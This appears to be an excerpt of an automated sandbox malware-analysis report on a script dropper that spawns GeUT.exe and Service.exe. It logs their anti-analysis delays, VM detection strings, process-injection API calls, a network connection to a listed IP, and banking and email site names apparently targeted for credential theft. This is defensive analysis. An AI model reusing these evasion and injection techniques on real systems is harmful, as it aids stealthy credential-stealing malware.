              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2A50000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2AD0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 4AD0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 1230000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 3000000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2E50000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2B20000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2C80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 4C80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 17F0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 3380000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 31A0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 1070000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2D60000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 4D60000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2B80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2DB0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2B80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2E20000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 3030000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 5030000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: F30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 29D0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 49D0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2C10000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2DB0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 4DB0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2650000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 27C0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 47C0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: C10000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2960000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: DA0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2740000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2910000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 4910000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: AD0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2560000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: B20000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2D60000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2FB0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2DD0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: C50000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 29A0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: F30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 830000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2270000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2090000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: B60000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2840000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2690000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 27B0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2930000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 4930000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: A40000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2520000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2390000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 1290000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2D30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2AB0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 820000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2720000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2430000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 20E0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 22E0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 42E0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: F60000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2730000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 4730000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 740000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2350000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 21B0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 15F0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 3100000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 15F0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: C80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 27E0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2610000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeWindow / User API: threadDelayed 9785Jump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1109
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 2940Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6816Thread sleep time: -30437127721620741s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5280Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5508Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5848Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6860Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6336Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 2156Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 332Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1988Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1928Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 3020Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 4044Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1568Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 4500Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 3572Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6364Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5932Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 3688Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 1528Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7076Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1000Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5944Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 4536Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 6452Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 2644Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5284Thread sleep count: 1109 > 30
              Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5284Thread sleep count: 213 > 30
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
              Source: GeUT.exe, 00000005.00000002.2741664040.0000000001287000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: discord.comVMware20,11696494690f
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: AMC password management pageVMware20,11696494690
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: outlook.office.comVMware20,11696494690s
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: interactivebrokers.comVMware20,11696494690
              Source: wscript.exe, 00000000.00000002.1479116437.000002BDE16E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: outlook.office365.comVMware20,11696494690t
              Source: wscript.exe, 00000000.00000002.1479202696.000002BDE1727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1468880158.000002BDE1727000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wscript.exe, 00000003.00000003.1507105229.000001EF34FA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: tasks.office.comVMware20,11696494690o
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: dev.azure.comVMware20,11696494690j
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: global block list test formVMware20,11696494690
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: bankofamerica.comVMware20,11696494690x
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: wscript.exe, 00000003.00000003.1507105229.000001EF34FA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\Ph
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: wscript.exe, 00000003.00000002.1509798308.000001EF37E8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD04&
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\System32\wscript.exe File created: GeUT.exe.3.dr
              Source: C:\Windows\System32\wscript.exe Network Connect: 192.210.215.11 80
              Source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, reflect.cs Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
              Source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, reflect.cs Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
              Source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, reflect.cs Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 340000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 790000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 3D0000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 1B0000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
